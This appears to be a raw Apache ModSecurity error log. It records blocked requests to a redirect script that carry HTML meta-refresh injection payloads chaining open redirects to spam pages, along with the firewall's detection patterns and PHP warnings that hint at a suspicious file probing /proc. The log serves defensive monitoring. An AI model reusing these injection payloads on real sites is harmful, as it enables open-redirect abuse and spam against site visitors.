[hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.010903 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e /> found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.011320 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.012285 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.012855 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.013144 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.654633 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://maps.google.tk/url?q=http://ezproxy.lib.uh.edu/login?url=http://www.ccof.net/?url=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://maps.google.tk/url?q=http://ezproxy.lib.uh.edu/login?url=http://www.ccof.net/?url=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:16.655801 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e /> found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:16.656546 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e /> found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:16.658137 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:16.658822 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:16.659464 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:16.659888 2026] [security2:error] [pid 1411201:tid 1411246] [client 194.233.64.127:51303] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaPy_GXSWIKeli0sA4QAAAIA"]
[Mon May 11 17:06:20.520768 2026] [authz_core:error] [pid 1411201:tid 1411258] [client 216.73.216.110:1393] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/error_log
[Mon May 11 17:06:24.343275 2026] [security2:error] [pid 1411201:tid 1411264] [client 101.32.239.179:49708] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agHwcPy_GXSWIKeli0sA8AAAAJI"]
[Mon May 11 17:06:40.177300 2026] [authz_core:error] [pid 1416109:tid 1416153] [client 216.73.216.110:8908] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/inc/entity/error_log
PHP Warning:  filesize(): stat failed for /proc/19/task/19/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/19/task/19/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/19/task/19/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/19/task/19/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/19/task/19/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/19/task/19/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:08:21.082826 2026] [security2:error] [pid 1412074:tid 1412077] [client 92.46.217.51:47700] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHw5TJnyuKVXoStDhbEDQAAAEE"], referer: https://www.piregwan-genesis.com/
[Mon May 11 17:09:20.740479 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://elegbederafiukenny@p.laus.i.bleljh@h.att.ie.m.c.d.o.w.e.ll2.56.6.3burton.rene@g.oog.l.eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:20.741311 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 /> found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:20.741481 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 /> found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:20.741588 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:20.741773 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSen [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:20.742205 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:20.742470 2026] [security2:error] [pid 1411201:tid 1411269] [client 194.233.64.127:58842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIPy_GXSWIKeli0sBtgAAAJg"]
[Mon May 11 17:09:21.416135 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://elegbederafiukenny@p.laus.i.bleljh@h.att.ie.m.c.d.o.w.e.ll2.56.6.3burton.rene@g.oog.l.eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:21.417329 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 /> found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id 